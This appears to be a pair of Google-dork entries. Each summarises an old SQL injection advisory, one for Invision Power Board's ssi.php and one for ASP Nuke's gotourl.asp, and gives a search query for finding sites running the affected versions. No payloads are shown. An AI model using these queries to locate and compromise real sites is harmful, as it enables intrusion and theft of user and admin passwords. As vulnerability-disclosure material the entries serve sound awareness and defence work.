Invision Power Board is reported prone to an SQL injection vulnerability in its ’ssi.php’ script. Due to improper filtering of user supplied data, ’ssi.php’ is exploitable by attackers to pass SQL statements to the underlying database. The impact of this vulnerability depends on the underlying database. It may be possible to corrupt/read sensitive data, execute commands/procedures on the database server or possibly exploit vulnerabilities in the database itself through this condition. Version 1.3.1 Final of Invision Power Board is reported vulnerable. Other versions may also be affected as well. More info: http://www.securityfocus.com/bid/10511/info/
Google Search: "Powered by Invision Power Board(U) v1.3 Final"

ASP Nuke is an open-source software application for running a community-based web site on a web server. By open-source, we mean the code is freely available for others to read, modify and use in accordance with the software license. The requirements for the ASP Nuke content management system are: 1. Microsoft SQL Server 2000 and 2. Microsoft Internet Information Server (IIS) 5.0 (http://www.aspnuke.com/)
On 30 Dec. 2003 the hackers Cobac and Alnitak discovered a bug in Asp Nuke (version 1.2, 1.3, and 1.4).
Problem: the file addurl-inc.asp included in the file gotourl.asp does not sanitize the input vars and makes SQL injection possible. For examples check the original advisory posted to a Spanish forum: http://66.102.11.104/search?q=cache:10-ze5DIJ-UJ:www.elhacker.net/ foro/index.php%3Ftopic%3D11830.0%3Bprev_next%3Dprev%22&hl=en (link broken in two lines, glue them together first :-)
An attacker can obtain the user and admin passwords by crafting a SQL statement.

Google Search: inurl:gotoURL.asp?url=